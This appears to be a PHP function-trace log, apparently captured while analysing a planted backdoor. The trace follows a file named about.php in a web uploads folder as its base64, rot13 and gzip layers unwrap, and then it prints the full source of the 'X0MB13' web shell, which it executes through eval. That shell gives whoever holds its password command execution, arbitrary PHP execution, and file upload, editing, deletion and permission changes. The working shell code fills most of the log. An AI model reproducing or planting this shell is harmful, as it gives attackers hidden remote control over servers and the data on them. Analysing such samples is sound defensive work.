2	6	0	0.000332	403592	base64_decode	0		/var/www/html/uploads/about.php	17	1	'7Rv9aptT8uf2vf4PG0wN0lLRVJw2SiHI1a7t3l0bO8rHeJ3k8UuygCUVwSI4g6v//XNpAQFPtpy73nSTOHNqdHN0dHN0c4eFM1OZwbhSmRObq86wq37xbHu+MDXFZFov5NyOFOiKw0F529zptI3jo9Ozaorl2bbyodslNzBH7dS0Nj7MKAtgGJB8V69w3k6yPUWF7REnQWyn++jw6yHMvSYJaowoQY3Y7EBGWfyAp5az6JSIPnxVHuTsXBwd/fRp+g6Jf+gSylWt706JG+TWjJ3YZmBXlQQxl5O0Rq4tPZubHvBvGK/e/jw1jK7atjm74sywduh1euNnbfLn6cm7lvx6nB69OvvLi5N264PaaRFGsyLLEEJAte27zGOBgLaCFU6DZNMRHZ1hXyFhHIyVPgylC2sUXata1wq7YG2Qv5HSgHjAtQEjHaXoRSrjnc1m92xUmYTUZ4hCE8rGPotGm5r60beTAWnrV2pcgdAOfD8Mh1D96NWrAgT4nwXIOvxP'
2	6	1	0.000372	411816
2	6	R			'�\033�j�S���\017\033L\r�R�T�6J!�ծ��]\033;��x���K��%\025�"8����si\001\001O����t�8sjtsttsts��3S���R�\023��ΰ�~�l{�05�dZ/�܎\024��Ay��鴍�ӳj��ٶ��%70G�Դ6>�(\v`\030�|W�p�N�=E��\021\'Al�����!̽&\tj�(A���@FY�����蔈>|U\036��\\\034\035��i�\016��\022�U��N�\033�֌��f`W�\0041���F�-=��\036�o\030��<5��ڶ9��̰v�uz�gm���ɻ��z�\036�:�ˋ�v��i\021F�"�\020B@���c����\025N�d�\021\035�a_!a\034��>\f�\vk\024]�Z�\n�`m���Ҁx��\001#\035��E*��f�lT���g�B\023��>�F���ѷ�\001i�Wj\\��\016|?\f�P��ի\002\004��\005�:�OI�����\034'
2	7	0	0.000489	411784	str_rot13	0		/var/www/html/uploads/about.php	17	1	'�\033�j�S���\017\033L\r�R�T�6J!�ծ��]\033;��x���K��%\025�"8����si\001\001O����t�8sjtsttsts��3S���R�\023��ΰ�~�l{�05�dZ/�܎\024��Ay��鴍�ӳj��ٶ��%70G�Դ6>�(\v`\030�|W�p�N�=E��\021\'Al�����!̽&\tj�(A���@FY�����蔈>|U\036��\\\034\035��i�\016��\022�U��N�\033�֌��f`W�\0041���F�-=��\036�o\030��<5��ڶ9��̰v�uz�gm���ɻ��z�\036�:�ˋ�v��i\021F�"�\020B@���c����\025N�d�\021\035�a_!a\034��>\f�\vk\024]�Z�\n�`m���Ҁx��\001#\035��E*��f�lT���g�B\023��>�F���ѷ�\001i�Wj\\��\016|?\f�P��ի\002\004��\005�:�OI�����\034'
2	7	1	0.000603	415912
2	7	R			'�\033�w�F���\017\033Y\r�E�G�6W!�ծ��]\033;��k���X��%\025�"8����fv\001\001B����g�8fwgfggfgf��3F���E�\023��ΰ�~�y{�05�qM/�܎\024��Nl��鴍�ӳw��ٶ��%70T�Դ6>�(\v`\030�|J�c�A�=R��\021\'Ny�����!̽&\tw�(N���@SL�����蔈>|H\036��\\\034\035��v�\016��\022�H��A�\033�֌��s`J�\0041���S�-=��\036�b\030��<5��ڶ9��̰i�hm�tz���ɻ��m�\036�:�ˋ�i��v\021S�"�\020O@���p����\025A�q�\021\035�n_!n\034��>\f�\vx\024]�M�\n�`z���Ҁk��\001#\035��R*��s�yG���t�O\023��>�S���ѷ�\001v�Jw\\��\016|?\f�C��ի\002\004��\005�:�BV�����\034'
2	8	0	0.000719	407688	gzinflate	0		/var/www/html/uploads/about.php	17	1	'�\033�w�F���\017\033Y\r�E�G�6W!�ծ��]\033;��k���X��%\025�"8����fv\001\001B����g�8fwgfggfgf��3F���E�\023��ΰ�~�y{�05�qM/�܎\024��Nl��鴍�ӳw��ٶ��%70T�Դ6>�(\v`\030�|J�c�A�=R��\021\'Ny�����!̽&\tw�(N���@SL�����蔈>|H\036��\\\034\035��v�\016��\022�H��A�\033�֌��s`J�\0041���S�-=��\036�b\030��<5��ڶ9��̰i�hm�tz���ɻ��m�\036�:�ˋ�i��v\021S�"�\020O@���p����\025A�q�\021\035�n_!n\034��>\f�\vx\024]�M�\n�`z���Ҁk��\001#\035��R*��s�yG���t�O\023��>�S���ѷ�\001v�Jw\\��\016|?\f�C��ի\002\004��\005�:�BV�����\034'
2	8	1	0.000886	424104
2	8	R			'reebe_ercbegvat(0);\r\n$kla=\'ghansrrfu\';\r\nvs(vffrg($_CBFG[\'cnff\'])) {vs($_CBFG[\'cnff\']==$cnffjbeq) {frgpbbxvr($kla, $_CBFG[\'cnff\'], gvzr()+3600);} yrg_uvz_va();}\r\nvs(!rzcgl($cnffjbeq) && !vffrg($_PBBXVR[$kla]) be ($_PBBXVR[$kla]!=$cnffjbeq)) {vavgvngr(); qvr();}\r\n$zr=onfranzr(__SVYR__);$freire_fbsg=$_FREIRE["FREIRE_FBSGJNER"];$hanzr=cuc_hanzr();$phe_hfre=trg_pheerag_hfre().\' hvq:\'.trgzlhvq().\' tvq:\'.trgzltvq();$fnsr_zbqr=vav_trg(\'fnsr_zbqr\');$fnsr_zbqr=($fnsr_zbqr)?(\'<sbag pbybe:pevzfba'
2	9	0	0.000935	419976	str_rot13	0		/var/www/html/uploads/about.php	17	1	'reebe_ercbegvat(0);\r\n$kla=\'ghansrrfu\';\r\nvs(vffrg($_CBFG[\'cnff\'])) {vs($_CBFG[\'cnff\']==$cnffjbeq) {frgpbbxvr($kla, $_CBFG[\'cnff\'], gvzr()+3600);} yrg_uvz_va();}\r\nvs(!rzcgl($cnffjbeq) && !vffrg($_PBBXVR[$kla]) be ($_PBBXVR[$kla]!=$cnffjbeq)) {vavgvngr(); qvr();}\r\n$zr=onfranzr(__SVYR__);$freire_fbsg=$_FREIRE["FREIRE_FBSGJNER"];$hanzr=cuc_hanzr();$phe_hfre=trg_pheerag_hfre().\' hvq:\'.trgzlhvq().\' tvq:\'.trgzltvq();$fnsr_zbqr=vav_trg(\'fnsr_zbqr\');$fnsr_zbqr=($fnsr_zbqr)?(\'<sbag pbybe:pevzfba'
2	9	1	0.000991	436392
2	9	R			'error_reporting(0);\r\n$xyn=\'tunafeesh\';\r\nif(isset($_POST[\'pass\'])) {if($_POST[\'pass\']==$password) {setcookie($xyn, $_POST[\'pass\'], time()+3600);} let_him_in();}\r\nif(!empty($password) && !isset($_COOKIE[$xyn]) or ($_COOKIE[$xyn]!=$password)) {initiate(); die();}\r\n$me=basename(__FILE__);$server_soft=$_SERVER["SERVER_SOFTWARE"];$uname=php_uname();$cur_user=get_current_user().\' uid:\'.getmyuid().\' gid:\'.getmygid();$safe_mode=ini_get(\'safe_mode\');$safe_mode=($safe_mode)?(\'<font color:crimson'
2	10	0	0.001527	515088	eval	1	'error_reporting(0);\r\n$xyn=\'tunafeesh\';\r\nif(isset($_POST[\'pass\'])) {if($_POST[\'pass\']==$password) {setcookie($xyn, $_POST[\'pass\'], time()+3600);} let_him_in();}\r\nif(!empty($password) && !isset($_COOKIE[$xyn]) or ($_COOKIE[$xyn]!=$password)) {initiate(); die();}\r\n$me=basename(__FILE__);$server_soft=$_SERVER["SERVER_SOFTWARE"];$uname=php_uname();$cur_user=get_current_user().\' uid:\'.getmyuid().\' gid:\'.getmygid();$safe_mode=ini_get(\'safe_mode\');$safe_mode=($safe_mode)?(\'<font color:crimson>ON</font>\'):(\'<font color=#ccff00>OFF</font>\');$cwd=getcwd();$bckC=\'#333333\';$txtC=\'#999999\';\r\n$start=\'<html><head><title>\'.getenv(\'HTTP_HOST\').\' => X0MB13</title><style>body {background:\'.$bckC.\';color:\'.$txtC.\';font-size:9pt;font-family:Trebuchet MS,cursive,sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:#79a317;}h1#nm{text-shadow:0px 0px 5px black;color:#79a317;}a {color:\'.$txtC.\';text-decoration:none;font-family:Comic Sans Ms,cursive,sans serif;}a:hover {color:#79a317;}hr {background:\'.$txtC.\';color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-size:13pt;}#menuB {background:\'.$bckC.\';box-shadow:0px 0px 10px black;border-radius:15px;padding:5px 20px 5px 20px;}table#moreI{font-size:9pt;background:\'.$bckC.\';border-radius:10px;box-shadow:0px 0px 10px black;padding:5px;position:fixed;bottom:40px;right:40px;display:none;}p#cp {font-size:11pt;}table#lt {font-size:10pt;}input#lt,input#sv {background:\'.$bckC.\';border-radius:10px;border:1px solid \'.$txtC.\';color:\'.$txtC.\';text-align:center;}input#ltb {background:rgba(0,0,0,0);border-radius:10px;color:\'.$txtC.\';box-shadow:0px 0px 1px \'.$txtC.\';border:0px solid rgba(0,0,0,0);}table#ft {font-size:9pt;padding:5px;border-radius:10px;box-shadow:0px 0px 10px black;}td#fh {border-bottom:1px solid \'.$txtC.\';padding-bottom:3px;}tr#fn:hover{box-shadow:0px 0px 5px black;}h3 {text-shadow:0px 0px 4px black;font-size:13pt;}textarea#edit {background:\'.$bckC.\';color:\'.$txtC.\';box-shadow:0px 0px 10px black;border-radius:10px;border:none;padding:10px;}</style><script type="text/javascript">function get_inf() {if(document.getElementById(\\\'moreI\\\').style.display=="block"){document.getElementById(\\\'moreI\\\').style.display="none"}else {document.getElementById(\\\'moreI\\\').style.display="block";}} function xyn(id1,id2) {document.getElementById(id1).style.display="block";document.getElementById(id2).style.display="none";}</script></head><body><h1 id="n"><a href="?x=x">X0MB13</a></h1>\';\r\n$menu=\'<center><p id="menu"><span id="menuB"><<a href="\'.$me.\'">Home</a>> <<a href="?x=cmd&d="\'.realpath(\'.\').\'">Command</a>> <<a href="?x=php&d="\'.realpath(\'.\').\'">PHP</a>> <<a href="javascript:get_inf();">Info</a>> <<a href="?x=q">Logout</a>> </span></p></center>\';$end=\'</body></html>\';$inf=\'<center><p id="inf">||| <b><i><u>Software:</u></i></b> \'.$server_soft.\'  |||  <b><i><u>Uname:</u></i></b> \'.$uname.\' |||</br>||| <b><i><u>User:</u></i></b> \'.$cur_user.\' ||| <b><i><u>Safe Mode:</u></i></b> \'.$safe_mode.\' ||| <b><i><u>Directory: </i></b></u>\'.$cwd.\' |||</p></center><hr>\';\r\nprint $start;print $menu;print $inf;\r\n$moreI=array(\'PHP Version\' => phpversion(),\'Zend Version\' => zend_version(),\'Magic Quotes\' => magic_quotes(),\'Curl\' => curl(),\'Register Globals\' => reg_globals(),\'OpenBase Dir\' => openbase_dir(),\'MySQL\' => myql(),\'Gzip\' => gzip(),\'MsSQL\' => mssql(),\'PostgreSQL\' => postgresql(),\'Oracle\' => oracle(),\'Total Space\' => h_size(disk_total_space(\'/\')) ,\'Used Space\' => h_size(disk_free_space(\'/\')),\'Your IP\' => $_SERVER[\'REMOTE_ADDR\'],\'Server IP\' => $_SERVER[\'SERVER_ADDR\']);print \'<table id="moreI">\'; foreach($moreI as $n => $v) {print \'<td>\'.$n.\'</td><td> :> </td><td> \'.$v.\'</td><tr>\';} print \'<td colspan=3 align="center"><a href="?x=phpinf" target="_blank">PHPInfo</a></td></table>\';\r\nif(isset($_GET[\'d\'])) {chdir($_GET[\'d\']);}\r\nif(isset($_REQUEST[\'x\']))\r\n{\r\n\tprint \'<p id="bck"><a href="?d=\'.realpath(\'.\').\'">BACK</a></p>\';\r\n\tswitch($_REQUEST[\'x\'])\r\n\t{\r\n\t\tcase \'c\': if(isset($_POST[\'edit_form\'])){$f=$_GET[\'f\'];$e=fopen($f,\'w\') or print \'<p id="nn">Error Opening File</p>\';fwrite($e,$_POST[\'edit_form\']) or print \'<p id="nn">Couldn\\\'t Save File</p>\';fclose($e);}print \'<center><p>Editing \'.$_GET[\'f\'].\' (\'.perms($_GET[\'d\'] . $_GET[\'f\']).\') .</p></br></br><form action="?x=c&d=\'.realpath(\'.\').\'&f=\'.$_GET[\'f\'].\'" method="POST"><textarea cols=90 rows=15 name="edit_form" id="edit">\';if(file_exists($_GET[\'f\'])){$c=file($_GET[\'f\']);foreach($c as $l){print htmlspecialchars($l);}}print \'</textarea></br></br><input type="submit" value="Save" id="sv"></form></center>\';break;\r\n\t\tcase \'cmd\': print \'</br></br><center><h3>Execute Command</h3><form action="?x=cmd&d=\'.realpath(\'.\').\'" method="POST"><input type="text" value="" name="cmd" id="lt">  <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">\';if(isset($_POST[\'cmd\'])) {$cmd=$_POST[\'cmd\']; execute(exec_meth(),$cmd);}print \'</textarea></center>\';break;\r\n\t\tcase \'php\': print \'</br></br><center><h3>PHP Code</h3><form action=?x=php&d="\'.realpath(\'.\').\'" method="POST"><input type="text" value="" name="pcode" id="lt"> <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">\';print \'</textarea></center>\';break;\r\n\t\tcase \'phpinf\': phpinfo();break;\r\n\t\tcase \'q\': setcookie($xyn,\'\',time()-3600);let_him_in();break;\r\n\t\tcase \'x\': print \'</br></br></br><center><h1 id="nm">H1 7H15 15 X0MB13</h1><h3>Mail: <a href="mailto:X0MB13@REBORN>COM">[email protected]</a></h3><h3>Twitter: <a href="http://www.twitter.com/X0MB13_" target="_blank">X0MB13</a></h3><h3>Facebook: <a href="http://www.fb.com/xombie.xombie.7" target="_blank">X0MB13</a></h3></center>\';break;\r\n\t}\r\n}\r\nelse\r\n{\r\n\tif(isset($_GET[\'d\'])) {chdir($_GET[\'d\']);}\r\n\tif(isset($_GET[\'ndir\'])) {$d=$_GET[\'d\'];$n=$_GET[\'ndir\'];mkdir($d .DIRECTORY_SEPARATOR. $n);}\r\n\tif(isset($_POST[\'new\'])) {$n=$_POST[\'new\'];$o=$_POST[\'old\'];$d=$_POST[\'d\'];rename($d.DIRECTORY_SEPARATOR.$o,$d.DIRECTORY_SEPARATOR.$n);}\r\n\tif(isset($_GET[\'deld\'])) {$d=$_GET[\'deld\']; rmdir($d);}\r\n\tif(isset($_GET[\'delf\'])) {$d=$_GET[\'delf\']; unlink($d);}\r\n\tif(isset($_GET[\'ch\'])) {$ch=$_GET[\'ch\']; $d=$_GET[\'df\']; chmod($d,$ch);}\r\n\tif(isset($_FILES[\'upfile\'][\'name\'])) {$d=realpath(\'.\').DIRECTORY_SEPARATOR.basename($_FILES[\'upfile\'][\'name\']);move_uploaded_file($_FILES[\'upfile\'][\'tmp_name\'],$d);}\r\n\tprint \'<p align="center" id="cp">\'.curpath(\'\').\'</p>\';\r\n\tprint \'<table width=90% align="center" id="lt"cellpadding="0"><td align="center"><form action="?d=\'.realpath(\'.\').\'" method="GET">Create Dir: <input type="hidden" name="d" value="\'.realpath(\'.\').\'" id="lt"><input type="text" value="" name="ndir" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d="\'.realpath(\'.\').\'" method="GET">Create File: <input type="hidden" value="\'.realpath(\'.\').\'" name="d" id="lt"><input type="hidden" value="c" name="x"><input type="text" value="" name="f" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?x=cmd&d=\'.realpath(\'.\').\'" method="POST">Command: <input type="text" value="" name="cmd" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d=\'.realpath(\'.\').\'" method="POST" enctype="multipart/form-data">Upload: <input type="hidden" value="100000000" name="MAX_FILE_SIZE"><input type="file" name="upfile" id="ltb"> <input type="submit" value="Go" id="lt"></form></td></table>\';\r\n\tprint \'</br>\';\r\n\t$filex=array();\r\n\t$dirx=array();\r\n\tprint \'<table width="75%" align="center" id="ft" ><td id="fh"><b>Name</b></td><td id="fh" align="center"><b>Permissions</b></td><td id="fh" align="center"><b>Owner</b></td><td id="fh" align="center"><b>Options</b></td><tr id="fn">\';\r\n\tif($handle=opendir(\'.\')) {while(false !== ($file=readdir($handle))) {if(is_dir($file)) {$dirx[] .= $file;} else {$filex[] .= $file;}}asort($filex);asort($dirx);$i=0;\r\n\tforeach($dirx as $file) {if(function_exists(\'posix_getpwuid\') && function_exists(\'posix_getgrgid\')) {$own=posix_getpwuid(fileowner($file)); $grp=posix_getgrgid(filegroup($file));} else {$own[\'name\']=\'???\'; $grp[\'name\']=\'???\';}  print \'<td id="fc"><span id="n\'.$file.\'"><a href="?d=\'.realpath($file).\'">\'.$file.\'</a></span><span id="r\'.$file.\'" style="display:none;"><form action="?d=\'.realpath(\'.\').\'" method="POST"><input type="hidden" value="\'.realpath(\'.\').\'" name="d"> <input type="text" value="\'.$file.\'" id="lt" name="new"><input type="hidden" value="\'.$file.\'" name="old"> <input type="submit" id="lt" value="Rename"> <input type="button" id="lt" value="Cancel" onClick="xyn(\\\'n\'.$file.\'\\\',\\\'r\'.$file.\'\\\');"></form></span><span id="d\'.$file.\'" style="display:none;"><form action="?d=\'.realpath(\'.\').\'" method="GET">Are you Sure?<input type="hidden" value="\'.realpath($file).\'" name="deld"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\\\'n\'.$file.\'\\\',\\\'d\'.$file.\'\\\')"></form></span></td><td id="fc" align="center"><span id="h\'.$file.\'"><a href="javascript:xyn(\\\'c\'.$file.\'\\\',\\\'h\'.$file.\'\\\');"><font color="\'.get_color($file).\'">\'.perms($file).\'</font></a></span><span id="c\'.$file.\'" style="display:none;"><form action="?d=\'.realpath(\'.\').\'" method="GET"><input type="hidden" value="\'.realpath($file).\'" name="df"><input type="text" value="\'.perms($file).\'" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\\\'h\'.$file.\'\\\',\\\'c\'.$file.\'\\\');"></form></span></td><td id="fc" align="center">\'.$own[\'name\'].\' : \'.$grp[\'name\'].\'</td>\'; if($i==0 or $i==1) {print \'<td id="fc"></td><tr id="fn">\';} else {print \'<td id="fc" align="center"><a href="javascript:xyn(\\\'r\'.$file.\'\\\',\\\'n\'.$file.\'\\\')">[R]</a> <a href="javascript:xyn(\\\'d\'.$file.\'\\\',\\\'n\'.$file.\'\\\')">[D]</a></td><tr id="fn">\';} $i++;}\r\n\tforeach($filex as $file) {if(function_exists(\'posix_getpwuid\') && function_exists(\'posix_getgrgid\')) {$own=posix_getpwuid(fileowner($file)); $grp=posix_getgrgid(filegroup($file));} else {$own[\'name\']=\'???\'; $grp[\'name\']=\'???\';} print \'<td id="fc"><span id="n\'.$file.\'"><a href="?x=c&d=\'.realpath(\'.\').\'&f=\'.$file.\'">\'.$file.\'</a></span><span id="r\'.$file.\'" style="display:none;"><form action="?d=\'.realpath(\'.\').\'" method="POST"><input type="hidden" value="\'.realpath(\'.\').\'" name="d"> <input type="text" id="lt" value="\'.$file.\'" name="new"><input type="hidden" value="\'.$file.\'" name="old"><input type="submit" id="lt" value="Rename"><input type="button" id="lt" value="Cancel" onClick="xyn(\\\'n\'.$file.\'\\\',\\\'r\'.$file.\'\\\');"></form></span><span id="d\'.$file.\'" style="display:none;"><form action="?d=\'.realpath(\'.\').\'" method="GET">Are you Sure?<input type="hidden" value="\'.realpath($file).\'" name="delf"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\\\'n\'.$file.\'\\\',\\\'d\'.$file.\'\\\')"></form></span></td><td id="fc" align="center"><span id="h\'.$file.\'"><a href="javascript:xyn(\\\'c\'.$file.\'\\\',\\\'h\'.$file.\'\\\');"><font color="\'.get_color($file).\'">\'.perms($file).\'</font></a></span><span id="c\'.$file.\'" style="display:none;"><form action="?d=\'.realpath(\'.\').\'" method="GET"><input type="hidden" value="\'.realpath($file).\'" name="df"><input type="text" value="\'.perms($file).\'" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\\\'h\'.$file.\'\\\',\\\'c\'.$file.\'\\\');"></form></span></td><td id="fc" align="center">\'.$own[\'name\'].\' : \'.$grp[\'name\'].\'</td><td id="fc" align="center"><a href="javascript:xyn(\\\'r\'.$file.\'\\\',\\\'n\'.$file.\'\\\')">[R]</a> <a href="javascript:xyn(\\\'d\'.$file.\'\\\',\\\'n\'.$file.\'\\\');">[D]</a></td><tr id="fn">\';}}\r\n\tprint \'</table></br></br></br>\';\r\n}\r\nfunction openbase_dir(){$x=ini_get(\'open_basedir\');if(!$x) {$o=\'<font color=#ccff00>OFF</font>\';}else {$o=\'<font color=crimson>ON</font>\';}return($o);}\r\nfunction magic_quotes(){$x=get_magic_quotes_gpc();if(empty($x)) {$m=\'<font color=#ccff00>OFF</font>\';}else {$m=\'<font color=crimson>ON</font>\';}return($m);}\r\nfunction curl(){if(extension_loaded(\'curl\')) {$c=\'<font color=crimson>ON</font>\';}else {$c=\'<font color=#ccff00>OFF</font>\';}return($c);}\r\nfunction reg_globals(){if(ini_get(\'reqister_globals\')) {$r=\'<font color=crimson>ON</font>\';}else {$r=\'<font color=#ccff00>OFF</font>\';}return($r);}\r\nfunction oracle(){if(function_exists(\'ocilogon\')) {$o=\'<font color=crimson>ON</font>\';}else {$o=\'<font color=#ccff00>OFF</font>\';}return($o);}\r\nfunction postgresql(){if(function_exists(\'pg_connect\')) {$p=\'<font color=crimson>ON</font>\';}else {$p=\'<font color=#ccff00>OFF</font>\';}return($p);}\r\nfunction myql(){if(function_exists(\'mysql_connect\')) {$m=\'<font color=crimson>ON</font>\';}else {$m=\'<font color=#ccff00>OFF</font>\';}return($m);}\r\nfunction mssql(){if(function_exists(\'mssql_connect\')) {$m=\'<font color=crimson>ON</font>\';}else {$m=\'<font color=#ccff00>OFF</font>\';}return($m);}\r\nfunction gzip(){if(function_exists(\'gzencode\')) {$m=\'<font color=crimson>ON</font>\';}else {$m=\'<font color=#ccff00>OFF</font>\';}return($m);}\r\nfunction h_size($s){if($s>=1073741824) {$s=round($s/1073741824*100)/100 .\'GB\';}elseif($s>=1048576) {$s=round($s/1048576*100)/100 .\'MB\';}elseif($s>=1024) {$s=round($s/1024*100)/100 .\'KB\';}else {$s=$s.\'B\';}return($s);}\r\nfunction curpath($d){if($d==\'\') {$d=getcwd();}$p=\'\';$n=\'\';$dx=explode(DIRECTORY_SEPARATOR,$d);for($i=0;$i < count($dx);$i++) {$g=$dx[$i];$p.=$dx[$i] . DIRECTORY_SEPARATOR; $n .=\'<a href="?d=\'.$p.\'">\'.$g.\'</a>\'.DIRECTORY_SEPARATOR;}return($n);}\r\nfunction get_color($f){if(is_writable($f)) {$c=\'#ccff00\';}if(!is_writable($f) && is_readable($f)) {$c=\'\'.$txtC.\'\';}if(!is_writable($f) && !is_readable($f)) {$c=\'crimson\';}return($c);}\r\nfunction perms($f) {if(file_exists($f)) {return substr(sprintf(\'%o\',fileperms($f)), -4);} else {return \'???\';}}\r\nfunction exec_meth() {if(function_exists(\'passthru\')) {$m=\'passthru\';} if(function_exists(\'exec\')) {$m=\'exec\';} if(function_exists(\'shell_exec\')) {$m=\'shell_exec\';} if(function_exists(\'system\')) {$m=\'system\';} if(!isset($m)) {$m=\'Disabled\';} return($m);}\r\nfunction execute($m,$c) {if($m==\'passthru\') {passthru($c);} elseif($m==\'system\') {system($c);} elseif($m==\'shell_exec\') {print shell_exec($c);} elseif($m==\'exec\') {exec($c,$r); foreach($r as $o) {print $o.\'</br>\';}} else {print \'dafuq?\';}}\r\nfunction initiate(){print \'<table border=0 width=100% height=100% align=center style="background:#333333;color:silver;"><td valign="middle"><center><form action="\'.basename(__FILE__).\'" method="POST">Password <input type="password" maxlength="10" name="pass" style="background:#333333;color:silver;border-radius:10px;border:1px solid silver;text-align:center;"> <input type="submit" value=">>" style="background:#333333;color:silver;border-radius:10px;border:1px solid silver;"></form></center></td></table>\';}\r\nfunction let_him_in() { header("Location: ".basename(__FILE__)); }\r\nprint $end;'	/var/www/html/uploads/about.php	17	0
3	11	0	0.001828	515088	error_reporting	0		/var/www/html/uploads/about.php(17) : eval()'d code	1	1	0
3	11	1	0.001844	515128
3	11	R			22527
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	2	$xyn = 'tunafeesh'
3	12	0	0.001875	515088	basename	0		/var/www/html/uploads/about.php(17) : eval()'d code	5	1	'/var/www/html/uploads/about.php(17) : eval()\'d code'
3	12	1	0.001893	515176
3	12	R			'about.php(17) : eval()\'d code'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	5	$me = 'about.php(17) : eval()\'d code'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	5	$server_soft = 'Apache/2.4.52 (Ubuntu)'
3	13	0	0.001935	515144	php_uname	0		/var/www/html/uploads/about.php(17) : eval()'d code	5	0
3	13	1	0.001950	515256
3	13	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	5	$uname = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
3	14	0	0.001985	515256	get_current_user	0		/var/www/html/uploads/about.php(17) : eval()'d code	5	0
3	14	1	0.002021	515296
3	14	R			'osboxes'
3	15	0	0.002037	515304	getmyuid	0		/var/www/html/uploads/about.php(17) : eval()'d code	5	0
3	15	1	0.002051	515304
3	15	R			1000
3	16	0	0.002064	515312	getmygid	0		/var/www/html/uploads/about.php(17) : eval()'d code	5	0
3	16	1	0.002076	515312
3	16	R			1000
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	5	$cur_user = 'osboxes uid:1000 gid:1000'
3	17	0	0.002102	515320	ini_get	0		/var/www/html/uploads/about.php(17) : eval()'d code	5	1	'safe_mode'
3	17	1	0.002115	515352
3	17	R			FALSE
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	5	$safe_mode = FALSE
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	5	$safe_mode = '<font color=#ccff00>OFF</font>'
3	18	0	0.002153	515320	getcwd	0		/var/www/html/uploads/about.php(17) : eval()'d code	5	0
3	18	1	0.002167	515368
3	18	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	5	$cwd = '/var/www/html/uploads'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	5	$bckC = '#333333'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	5	$txtC = '#999999'
3	19	0	0.002214	515368	getenv	0		/var/www/html/uploads/about.php(17) : eval()'d code	6	1	'HTTP_HOST'
3	19	1	0.002229	515440
3	19	R			'localhost'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	6	$start = '<html><head><title>localhost => X0MB13</title><style>body {background:#333333;color:#999999;font-size:9pt;font-family:Trebuchet MS,cursive,sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:#79a317;}h1#nm{text-shadow:0px 0px 5px black;color:#79a317;}a {color:#999999;text-decoration:none;font-family:Comic Sans Ms,cursive,sans serif;}a:hover {color:#79a317;}hr {background:#999999;color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:1'
3	20	0	0.002278	517576	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	7	1	'.'
3	20	1	0.002293	517656
3	20	R			'/var/www/html/uploads'
3	21	0	0.002308	517608	realpath	0		/var/www/html/uploads/about.php(17) : eval()'d code	7	1	'.'
3	21	1	0.002322	517688
3	21	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	7	$menu = '<center><p id="menu"><span id="menuB"><<a href="about.php(17) : eval()\'d code">Home</a>> <<a href="?x=cmd&d="/var/www/html/uploads">Command</a>> <<a href="?x=php&d="/var/www/html/uploads">PHP</a>> <<a href="javascript:get_inf();">Info</a>> <<a href="?x=q">Logout</a>> </span></p></center>'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	7	$end = '</body></html>'
2		A						/var/www/html/uploads/about.php(17) : eval()'d code	7	$inf = '<center><p id="inf">||| <b><i><u>Software:</u></i></b> Apache/2.4.52 (Ubuntu)  |||  <b><i><u>Uname:</u></i></b> Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 |||</br>||| <b><i><u>User:</u></i></b> osboxes uid:1000 gid:1000 ||| <b><i><u>Safe Mode:</u></i></b> <font color=#ccff00>OFF</font> ||| <b><i><u>Directory: </i></b></u>/var/www/html/uploads |||</p></center><hr>'
3	22	0	0.002397	518184	phpversion	0		/var/www/html/uploads/about.php(17) : eval()'d code	9	0
3	22	1	0.002410	518248
3	22	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
3	23	0	0.002426	518944	zend_version	0		/var/www/html/uploads/about.php(17) : eval()'d code	9	0
3	23	1	0.002439	518976
3	23	R			'3.2.0'
3	24	0	0.002453	518976	magic_quotes	1		/var/www/html/uploads/about.php(17) : eval()'d code	9	0
4	25	0	0.002466	518976	get_magic_quotes_gpc	0		/var/www/html/uploads/about.php(17) : eval()'d code	45	0
4	25	1	0.002478	518976
4	25	R			FALSE
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	45	$x = FALSE
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	45	$m = '<font color=#ccff00>OFF</font>'
3	24	1	0.002516	518976
3	24	R			'<font color=#ccff00>OFF</font>'
3	26	0	0.002532	518976	curl	1		/var/www/html/uploads/about.php(17) : eval()'d code	9	0
4	27	0	0.002544	518976	extension_loaded	0		/var/www/html/uploads/about.php(17) : eval()'d code	46	1	'curl'
4	27	1	0.002558	519016
4	27	R			TRUE
3		A						/var/www/html/uploads/about.php(17) : eval()'d code	46	$c = '<font color=crimson>ON</font>'
3	26	1	0.002584	518976
3	26	R			'<font color=crimson>ON</font>'
3	28	0	0.002600	518976	reg_globals	1		/var/www/html/uploads/about.php(17) : eval()'d code	9	0
